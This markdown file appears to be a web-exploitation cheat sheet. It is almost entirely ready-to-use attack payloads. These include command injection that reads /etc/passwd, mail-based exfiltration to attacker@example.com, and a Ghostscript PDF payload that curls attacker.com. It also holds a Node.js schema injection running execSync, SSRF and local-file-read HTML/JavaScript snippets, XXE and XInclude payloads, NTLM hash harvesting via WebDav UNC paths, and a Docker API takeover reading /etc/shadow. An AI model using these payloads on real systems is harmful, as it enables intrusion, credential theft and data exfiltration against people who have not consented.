methods-exploit-web.md

Web Exploitation Methods

Enumeration

HTTP PROBE using cURL

cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk

PHP Disabled Function Check

<?php var_dump(explode(',',ini_get('disable_functions'))); ?>

Exploitation

Linux Command Injection

No Spaces Command Injection

# exec command, no spaces
$ {cat,/etc/passwd}

# write file, no spaces
{script,-c,"Y2F0IC9ldGMvcGFzc3dk",/dev/shm/run.b64}

# source: https://www.betterhacker.com/2016/10/command-injection-without-spaces.html
CMD=$'\x20/etc/passwd'&&cat$CMD

File Write No Redirectors

# setup payload
attacker$ echo -n whoami | base64 -w 0

# write base64
victim$ shuf -e <base64> -o /dev/shm/run.b64

# write decoded command 
victime$ openssl base64 -d -in /dev/shm/run.b64 -out /dev/shm/run.sh

Exfil via Email

echo "message body: $(cat /etc/passwd)" | mail -s "loot" attacker@example.com
cat /etc/passwd | sendmail attacker@example.com

PDF RCE

https://www.openwall.com/lists/oss-security/2018/08/21/2

Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"
Content-Type: application/pdf

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
.putdeviceparams
quit

Node.JS JSON Validation Command Injection (RCE)

// https://hackerone.com/reports/894308
const schema = {
  type: 'object',
  properties: {
    'x[console.log(process.mainModule.require(`child_process`).execSync(`cat /etc/passwd`).toString(`utf-8`))]': {
      required: true,
      type:'string'
    }
  },
}

PDF Export Injection / HTML Injection / Server Side Request Forgery (SSRF) Local File Read

Using HTML

iframe

<iframe src="file:///C:/windows/system32/drivers/etc/hosts height=1000 width=1000/>

Via securityonline.info

object

<object data=”http://127.0.0.1:8443”/>

link

# local file read
<link rel=attachment src="file:///etc/passwd">
# to extract
pdfdetach -saveall vuln.doc

Using Javascript

<script>x=new XMLHttpRequest; 
x.onload=function(){ document.write(this.responseText) }; 
x.open("GET","file:///etc/passwd"); x.send(); </script> 

Via noob.ninja

object

<html>
  <body>
    <object data="file:///etc/passwd"/>
  </body>
</html>

portal

<html>
  <body>
    <portal src="file:///etc/passwd" id=portal></portal>
  </body>
</html>

Harvesting Credentials

UNC + WebDav can be used to harvest NTLM on arbitrary ports allowed through the firewall.

# WebDav HTTP UNC Path
\\workstation1@8080\mdsec.png

• Source: https://www.mdsec.co.uk/2021/02/farming-for-red-teams-harvesting-netntlm/

XXE

• XXE inside a SOAP node:

<soap:Body>
  <foo>
    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://0x0:22/"> %dtd;]><xxx/>]]>
  </foo>
</soap:Body>

Using xinclude

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

Misc

Docker API (2375/tcp) Easy RCE by PTSwarm

# exploit
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

# file access
cat /mnt/etc/shadow

# RCE
chroot /mnt